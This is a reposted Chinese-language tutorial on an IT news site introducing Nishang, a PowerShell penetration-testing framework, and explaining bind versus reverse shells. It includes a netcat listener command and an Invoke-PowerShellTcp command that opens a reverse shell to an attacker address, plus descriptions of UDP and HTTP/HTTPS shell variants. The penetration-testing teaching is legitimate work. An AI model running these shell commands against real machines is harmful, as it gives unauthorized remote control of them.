IT学习网 - 爱学习 - 最具影响力综合资讯网站 -- 中国IT界的领航者!
热门关键字:      88888  as  xxx
站外
广告
站外
广告

网络安全检测之渗透神器Nishang

发布时间:2016-11-19 17:00文章来源:互联网文章作者: 佚名点击次数:
Nishang是一个PowerShell攻击框架,它是PowerShell攻击脚本和有效载荷的一个集合。Nishang被广泛应用于渗透测试的各个阶段,本文主要介绍如何使用Nishang的各种姿势获取一个shell。 正向连接and反向连接 新手肯定都有这个疑问,什么时候用正向连接,什么时候

Nishang是一个PowerShell攻击框架,它是PowerShell攻击脚本和有效载荷的一个集合。Nishang被广泛应用于渗透测试的各个阶段,本文主要介绍如何使用Nishang的各种姿势获取一个shell。

正向连接and反向连接

新手肯定都有这个疑问,什么时候用正向连接,什么时候用反向连接呢?其实很简单:

目标在外网而你在内网的时候,用正向连接。

目标在内网而你在外网的时候,用反向连接。

都在外网的时候,两种方式皆可。

Powershell交互式Shell

一、基于TCP协议的Powershell交互式Shell

Invoke-PowerShellTcp是PowerShell交互式正向连接或反向连接shell,基于TCP协议。

参数介绍:

-IPAddress 选择-Reverse选项时是需要连接到的IP地址

-Port 选择-Reverse选项时是需要连接到的端口,选择-Bind选项时是需要监听的端口。

-Reverse [] 反向连接

-Bind [] 正向连接

使用实例:

1. 正向连接

第一步:在目标机运行脚本,监听端口86

\

第二步:使用nc连接到目标机端口86

\

2. 反向连接

第一步:使用nc监听本地端口86(注意必须先监听,不然在目标机上执行脚本会出错)

[email protected]:~# nc -ltp 86

第二步:在目标机上反弹shell

Invoke-PowerShellTcp -Reverse -IPAddress 192.168.110.128 -Port 86

第三步:观察攻击机,可以发现成功反弹shell

\

二、基于UDP协议的PowerShell交互式Shell

Invoke-PowerShellUdpPowershell交互式正向连接或反向连接shell,基于UDP协议。

使用实例:

1. 正向连接

正向连接,和上面用法相同,不过是基于UDP协议,所以nc命令就要改动一下了。

\

2. 反向连接

反向连接,和上面用法相同,不过在使用nc监听的时候使用UDP协议。

\

三、基于HTTP和HTTPS协议的PowerShell交互式Shell

Invoke-PoshRatHttp and Invoke-PoshRatHttps是Powershell交互式反向连接shell,基于HTTP协议和HTTPS协议。

用法实例:(由于两种脚本用法相同,这里以基于HTTP协议的脚本为例子)

第一步:首先我们需要在攻击机上使用脚本,需要的信息有攻击机IP,要监听的端口。运行完脚本,就等着目标机反弹Shell了。

\

第二步:在目标机上运行下列命令,反弹Shell

\

扫描进行时

Nishang基本上包含了渗透测试各个阶段的脚本,在扫描阶段,它也有两个很实用的脚本暴力破解和端口扫描。
网络安全检测之渗透神器Nishang
本文由 IT学习网 整理,转载请注明“转自IT学习网”,并附上链接。
原文链接:http://www.ourlove520.com/Article/netsafe/gongju/560194.html

标签分类:

上一篇:上一篇:静态分析工具大集合
下一篇: 下一篇:没有了
无觅关联推荐,快速提升流量